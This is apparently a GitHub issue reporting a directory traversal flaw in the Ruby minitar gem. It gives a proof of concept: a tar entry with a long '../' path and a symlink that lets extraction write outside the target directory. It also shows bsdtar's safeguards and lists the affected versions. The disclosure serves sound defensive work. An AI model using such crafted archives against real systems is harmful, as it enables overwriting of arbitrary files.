Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Minitar directory traversal vulnerability #5

Open
ecneladis opened this issue Aug 22, 2016 · 1 comment
Open

Minitar directory traversal vulnerability #5

ecneladis opened this issue Aug 22, 2016 · 1 comment

Comments

@ecneladis
Copy link

ecneladis commented Aug 22, 2016
edited

Overview

Minitar allows attackers to overwrite arbitrary files during archive extraction via a .. (dot dot) in an extracted filename. Analogous vulnerabilities for unzip and tar: https://www.cvedetails.com/cve/CVE-2001-1268/ and http://www.cvedetails.com/cve/CVE-2001-1267/

Proof of Concept

~/current/tar_symlink ❯ tar -tvf symlink-overwrite.tar
lrwxrwxrwx  0 0      0           0 Jan  1  1970 ../../../../../../../../../../../../../../tmp/qwerty→

Actual behaviour:
~/current/tar_symlink ❯ rm -rf /tmp/qwerty1234
~/current/tar_symlink ❯ minitar extract symlink-overwrite.tar
~/current/tar_symlink ❯ ls -al /tmp/qwerty1234
-rwxrwxrwx 1 anon wheel 0 Jan 12 22:44 /tmp/qwerty1234

Desired behaviour:

~/current/tar_symlink ❯ tar -xf symlink-overwrite.tar
../../../../../../../../../../../../../../tmp/qwerty1234: Path contains '..'
tar: Error exit delayed from previous errors.

Example how bsdtar handles this kind of issues:

 o       Archive entries can have absolute pathnames.  By default, tar
         removes the leading / character from filenames before restoring
         them to guard against this problem.

 o       Archive entries can have pathnames that include .. components.
         By default, tar will not extract files containing .. components
         in their pathname.

 o       Archive entries can exploit symbolic links to restore files to
         other directories.  An archive can restore a symbolic link to
         another directory, then use that link to restore a file into that
         directory.  To guard against this, tar checks each extracted path
         for symlinks.  If the final path element is a symlink, it will be
         removed and replaced with the archive entry.  If -U is specified,
         any intermediate symlink will also be unconditionally removed.
         If neither -U nor -P is specified, tar will refuse to extract the
         entry.

Vulnerable, verified versions of gems:

~ ❯ gem list | grep tar
archive-tar-minitar (0.5.2)
minitar (0.5.4)

Related issues: halostatue/minitar#16
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@halostatue @ecneladis